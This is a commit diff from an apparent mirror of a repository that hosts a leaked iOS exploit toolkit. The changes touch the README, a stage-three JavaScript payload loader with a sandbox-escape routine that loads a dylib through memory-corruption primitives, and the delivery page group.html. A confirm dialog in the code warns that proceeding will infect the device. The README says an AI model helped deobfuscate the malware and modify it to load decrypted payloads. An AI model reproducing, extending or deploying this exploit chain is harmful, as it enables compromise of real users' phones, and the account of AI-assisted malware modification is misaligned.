CalvinBackup/coruna
1
0
Fork 0
mirror of https://github.com/khanhduytran0/coruna.git synced 2026-04-26 05:36:00 +02:00
Code Issues Packages Projects Releases Wiki Activity

Add confirm dialog back

Browse Source
This commit is contained in:
khanhduytran0
2026-03-08 07:14:53 +07:00
parent d1f2483377
commit cf579abf20
3 changed files with 19 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files
README.md
+1 -1
View File
@@ -2,7 +2,7 @@
The leaked exploit toolkit for various iOS versions. Extracted from `https://sadjd.mijieqi[.]cn/group.html`
Partially deobfuscated and symbolicated by Claude (thanks @34306 for sponsor) and by hand.
Partially deobfuscated, symbolicated, and modified to load decrypted payloads by Claude (thanks @34306 for sponsor) and by hand.
These scripts are modified in a way that allows you to host them locally. Note that this only includes exploit chains for tested devices.
Stage3_VariantB.js
+16 -3
View File
@@ -1160,6 +1160,7 @@ function YA() {/* Original: YA → resolveSymbols */
},
// Fetch a single file as ArrayBuffer
fetchBin(url) {
window.log("Downloading " + url);
return new Promise((resolve, reject) => {
const xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
@@ -1244,6 +1245,18 @@ function YA() {/* Original: YA → resolveSymbols */
if (lastSlash >= 0) hashName = hashName.substring(lastSlash + 1);
hashName = hashName.replace(/\.min\.js$/, "").replace(/\.js$/, "");
// When we load the metadata, ask user if they want to continue (will infect device)
if (hashName === "7a7d99099b035b2c6512b6ebeeea6df1ede70fbb") {
let shouldContinue = confirm(
"The script is about to load metadata and subsequent payloads to infect your device in `powerd` process.\n" +
"Cancel = safely STOP this operation\n" +
"OK = continue infect your device");
if (!shouldContinue) {
window.log("[LOADER] Execution canceled by user.");
return;
}
}
// Fetch decrypted F00DBEEF container from payloads/ directory
window.log("[LOADER] Loading payload: " + hashName);
const container = await E.buildContainer(hashName);
@@ -1368,7 +1381,7 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */
for (let _i = 0; _i < _buf.length; _i += 2)
_oA += String.fromCharCode(_buf[_i] | ((_buf[_i + 1] || 0) << 8));
g.oA = _oA;
window.log("[PATCH] Loaded dylib: " + _buf.length + "B, oA=" + _oA.length +
window.log("[PATCH] Loaded bootstrap.dylib: " + _buf.length + "B, oA=" + _oA.length +
" (orig " + _origLen + "), _process=0x" + _processOff.toString(16));
// ── END PATCH (redirect applied after buffer is built, below) ──
@@ -1393,12 +1406,12 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */
} else {
window.log("[PATCH] _process at original offset 0x" + _ORIG_PROCESS_OFF.toString(16) + ", no redirect needed");
}
window.addDownloadBinary("lzwDecoded.dylib", new Uint32Array(dylibBuffer.slice(0)));
//window.addDownloadBinary("lzwDecoded.dylib", new Uint32Array(dylibBuffer.slice(0)));
const dylibLoadAddressI64 = utilityModule.Int64.fromNumber(dylibLoadAddress),
dylibDataAddressMaybe = utilityModule.Int64.fromNumber(platformModule.platformState.exploitPrimitive.fakeobj(dylibBuffer));
window.log("dylib load address: 0x" + dylibLoadAddress.toString(16));
window.log("data address?: 0x" + dylibDataAddressMaybe.toNumber().toString(16));
window.log("D: 0x" + dylibSize);
window.log("dylib size: 0x" + dylibSize);
platformModule.platformState.sandboxEscape.Ad(dylibLoadAddressI64, dylibDataAddressMaybe, dylibSize);
const T = g.YA().ct() + 4;
//alert("D 0x" + T.toString(16));
group.html
+2 -2
View File
@@ -11,8 +11,8 @@
<body>
<script src="https://cdn.jsdelivr.net/npm/eruda"></script>
<script>eruda.init();</script>
<!-- <script src="https://cdn.jsdelivr.net/npm/eruda"></script>
<script>eruda.init();</script> -->
<script src="platform_module.js"></script>
<script src="utility_module.js"></script>